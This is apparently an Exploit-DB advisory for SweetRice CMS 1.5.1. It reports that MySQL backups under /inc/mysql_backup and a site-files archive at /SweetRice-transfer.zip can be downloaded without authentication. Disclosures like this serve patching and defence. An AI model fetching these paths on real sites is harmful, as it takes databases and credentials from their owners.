SweetRice 1.5.1 - Backup Disclosure

Author: Ashiyane Digital Security Team
type: webapps
platform: php
port: 
date_added: 2016-11-06 
date_updated: 2016-11-06 
verified: 1 
codes:  
tags: 
aliases:  
screenshot_url: http://www.exploit-db.com/screenshots/idlt41000/screen-shot-2016-11-06-at-150052.png 
application_url: http://www.exploit-db.comsweetrice-1.5.1.zip

Title: SweetRice 1.5.1 - Backup Disclosure
Application: SweetRice
Versions Affected: 1.5.1
Vendor URL: http://www.basic-cms.org/
Software URL: http://www.basic-cms.org/attachment/sweetrice-1.5.1.zip
Discovered by: Ashiyane Digital Security Team
Tested on: Windows 10
Bugs: Backup Disclosure
Date: 16-Sept-2016


Proof of Concept :

You can access to all mysql backup and download them from this directory.
http://localhost/inc/mysql_backup

and can access to website files backup from:
http://localhost/SweetRice-transfer.zip